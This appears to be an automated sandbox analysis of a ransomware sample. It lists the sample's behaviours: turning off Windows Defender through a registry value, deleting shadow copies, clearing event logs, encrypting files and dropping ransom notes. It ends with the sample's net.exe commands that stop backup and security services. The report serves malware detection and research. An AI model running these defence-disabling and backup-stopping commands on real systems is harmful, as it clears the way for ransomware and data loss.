Analysis Overview
SHA256
8911b5d28e47048d4db01cefb105a74b070fc1126e5952bb4e383dcc1330a927
Threat Level: Known bad
The file d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.7z was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Hive
Modifies security service
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Suspicious use of WriteProcessMemory
Runs net.exe
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-12 16:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 16:49
Reported
2022-01-12 16:54
Platform
win7-en-20211208
Max time kernel
190s
Max time network
125s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_HfWYPhQrYmA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\MP00021_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_riMptI5m7HU0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\init.js | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\fr-FR\css\settings.css | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Media Player\es-ES\WMPDMCCore.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\slideShow.html | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_QVae35UIwqM0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_t0FT4y1WQNc0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01240_.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2YkZ_mCLLAQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZyruyCrLZko0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_lR-LH5BGSzA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_dG1gKCL2XYE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\J0115876.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_h69GoWNI8Rg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_zuO3f0bQsTo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\LEVEL\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FRAR\MSB1FRAR.ITS.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_EdAzsFPoOrI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0283209.GIF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_8QcjDG7rB2k0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_TivHynjiEpY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeLetter.Dotx.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_hlIDUXEtFVY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_sPLEMuIXMUg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\js\settings.js | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232795.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_6rB34lbx0Jg0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_GNPLvFP_zFw0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-bootstrap.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H__x8qpQUJIsE0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01631_.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2zSkv8zaRpQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105588.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_vnpVUI0zmOQ0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\gadget.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ydqZ9Eibfxs0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_Jb5GmcdELIA0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_2OXoKfEVGg40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Excel.en-us\ExcelMUI.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_XmlTqu87f5s0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRID_01.MID.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MebdR_icuSY0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_k47sWypKUJ00.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_W571iuh6NH40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\settings.css | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Vienna.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_tf-jit-Efes0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0217872.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_bMr12DL6XJI0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\EMAIL.XML.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_ZU91AzFYbw40.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309902.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_UlMp6y1OYVs0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\gadget.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_4AjEF-b91xo0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\iotb_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\SIGNUP\install.ins.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_1CNpioIEzQk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_0Z_gQNoQDd80.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_MfeouGtus0c0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105250.WMF.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_A_J90vBBQkk0.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Godthab.cKveGpuA3jmCXT-CJTqvHB3PpgnazLrBOM1TRyLqh7H_m1IaTRXRn340.j2xnp | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe
"C:\Users\Admin\AppData\Local\Temp\d64f9742539436acba5ff9c4f1c8ca501cad86dfa823828b65418b493c8109ac.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
